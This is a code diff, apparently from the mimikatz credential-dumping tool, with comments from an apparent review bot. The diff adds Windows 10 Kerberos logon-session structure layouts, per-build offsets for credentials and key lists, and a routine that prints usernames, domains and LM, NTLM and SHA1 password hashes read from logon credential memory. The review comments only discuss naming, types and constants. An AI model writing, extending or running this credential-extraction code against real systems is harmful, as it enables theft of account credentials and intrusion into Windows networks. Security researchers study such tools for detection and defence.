@ -116,6 +135,54 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION
|
|||
PUNICODE_STRING pinCode; // not only PIN (CSP Info)
|
||||
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
|
||||
|
||||
typedef struct _KIWI_KERBEROS_LOGON_SESSION_10 {
|
||||
ULONG UsageCount;
|
||||
LIST_ENTRY unk0;
|
||||
PVOID unk1;
|
||||
ULONG unk1b;
|
||||
FILETIME unk2;
|
||||
PVOID unk4;
|
||||
PVOID unk5;
|
||||
PVOID unk6;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
FILETIME unk7;
|
||||
PVOID unk8;
|
||||
ULONG unk8b;
|
||||
FILETIME unk9;
|
||||
PVOID unk11;
|
||||
PVOID unk12;
|
||||
PVOID unk13;
|
||||
#ifdef _M_IX86
|
||||
ULONG unkAlign;
|
||||
#endif
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
|
||||
ULONG unk14;
|
||||
ULONG unk15;
|
||||
ULONG unk16;
|
||||
ULONG unk17;
|
||||
PVOID unk18;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PVOID pKeyList;
|
||||
PVOID unk23;
|
||||
LIST_ENTRY Tickets_1;
|
||||
FILETIME unk24;
|
||||
LIST_ENTRY Tickets_2;
|
||||
FILETIME unk25;
|
||||
LIST_ENTRY Tickets_3;
|
||||
FILETIME unk26;
|
||||
PUNICODE_STRING pinCode; // not only PIN (CSP Info)
|
||||
} KIWI_KERBEROS_LOGON_SESSION_10, *PKIWI_KERBEROS_LOGON_SESSION_10;
|
||||
|
||||
typedef struct _KERB_INFOS {
|
||||
LONG offsetLuid;
|
||||
LONG offsetCreds;
|
||||
LONG offsetPin;
|
||||
LONG offsetKeyList;
|
||||
SIZE_T structSize;
|
||||
} KERB_INFOS, *PKERB_INFOS;
|
||||
|
||||
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
|
||||
{
|
||||
ULONG isSupp;
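Review bot: `KERB_INFOS` is introduced without a comment saying what the four `LONG` offsets and `structSize` describe; since `kerbHelper[]` fills them with `FIELD_OFFSET` values of the two `KIWI_KERBEROS_LOGON_SESSION` variants and selects an entry by `NtBuildNumber`, a header comment such as `// per-build field offsets into KIWI_KERBEROS_LOGON_SESSION / _10 plus that struct's size; indexed via kerbHelper[]` would make the indirection clear. The x86-only `ULONG unkAlign;` in `KIWI_KERBEROS_LOGON_SESSION_10` deserves a word on why padding is needed only there. Declaring `structSize` as `SIZE_T` while the reader casts it to `ULONG` at the ReadMemory call suggests `ULONG` would be the more honest type.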
|
||||
|
|
|
@ -196,11 +196,13 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
|||
{
|
||||
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL_10 pPrimaryCreds10;
|
||||
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
|
||||
PKERB_HASHPASSWORD_6 pHashPassword;
|
||||
UNICODE_STRING buffer;
|
||||
PVOID base;
|
||||
DWORD type, i;
|
||||
BOOL isNull = FALSE;
|
||||
|
||||
if(mesCreds)
|
||||
{
|
||||
|
@ -237,6 +239,36 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
|||
kull_m_string_dprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10:
|
||||
pPrimaryCreds10 = (PMSV1_0_PRIMARY_CREDENTIAL_10) credentials->Buffer;
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->UserName, FALSE);
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE);
|
||||
|
||||
dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName);
|
||||
dprintf("\n\t * Flags : %02x/N%02x/L%02x/S%02x/%02x/%02x/%02x/%02x", pPrimaryCreds10->isUnk0, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword, pPrimaryCreds10->isUnk1, pPrimaryCreds10->isUnk2, pPrimaryCreds10->isUnk3, pPrimaryCreds10->isUnk4);
|
||||
if(pPrimaryCreds10->isLmOwfPassword)
|
||||
{
|
||||
dprintf("\n\t * LM : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds10->isNtOwfPassword)
|
||||
{
|
||||
dprintf("\n\t * NTLM : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds10->isShaOwPassword)
|
||||
{
|
||||
dprintf("\n\t * SHA1 : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
dprintf("\n\t * unknow : ");
|
||||
for(i = 0; !isNull && (i < 128); i++)
|
||||
isNull |= !pPrimaryCreds10->UnkStruct[i];
|
||||
if(isNull)
|
||||
dprintf("[0..0]");
|
||||
else
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->UnkStruct, 128, 0);
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
|
||||
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
|
||||
base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY);
|
||||
|
|
|
@ -16,7 +16,8 @@ USHORT NtBuildNumber;
|
|||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL 0x08000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY 0x01000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x03000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST 0x00200000
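Review bot: `KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY`, `_PRIMARY_10` and `_CREDENTIALKEY` are now the consecutive values 1, 2 and 3 inside the field masked by `KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK`, not independent bit flags, and `_CREDENTIALKEY` changes from 0x02000000 to 0x03000000 in the process; a comment above the group, `// values of the field selected by KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK (not bit flags)`, would stop a reader from OR-ing them together. Any code that compares the flags word against a literal rather than the macro would silently break with the renumbering, which is worth a grep across the callers.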
|
||||
|
@ -63,10 +64,13 @@ VOID kuhl_m_sekurlsa_genericKeyOutput(struct _MARSHALL_KEY * key, PVOID * dirtyB
|
|||
#define KULL_M_WIN_BUILD_7 7600
|
||||
#define KULL_M_WIN_BUILD_8 9200
|
||||
#define KULL_M_WIN_BUILD_BLUE 9600
|
||||
#define KULL_M_WIN_BUILD_10 9800
|
||||
#define KULL_M_WIN_BUILD_10b 9879
|
||||
|
||||
#define KULL_M_WIN_MIN_BUILD_XP 2500
|
||||
#define KULL_M_WIN_MIN_BUILD_2K3 3000
|
||||
#define KULL_M_WIN_MIN_BUILD_VISTA 6000
|
||||
#define KULL_M_WIN_MIN_BUILD_7 7000
|
||||
#define KULL_M_WIN_MIN_BUILD_8 8000
|
||||
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
|
||||
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
|
||||
#define KULL_M_WIN_MIN_BUILD_10 9800
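Review bot: `KULL_M_WIN_BUILD_10` and the new `KULL_M_WIN_MIN_BUILD_10` are both 9800, whereas every other pair in these two lists keeps the `MIN_` value below the corresponding `BUILD_` value (8000/9200, 9400/9600), and `KULL_M_WIN_BUILD_10b 9879` has no `MIN_` counterpart; it is not clear from the names whether 10b is a second Windows 10 threshold or a correction of the first. A trailing comment on `KULL_M_WIN_BUILD_10b` stating what the `b` suffix denotes and which comparisons should use it would keep callers from picking the wrong constant, given that the kerberos and msv callbacks in this commit compare against `10b` while the x86 CngReferences table uses `10`.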
|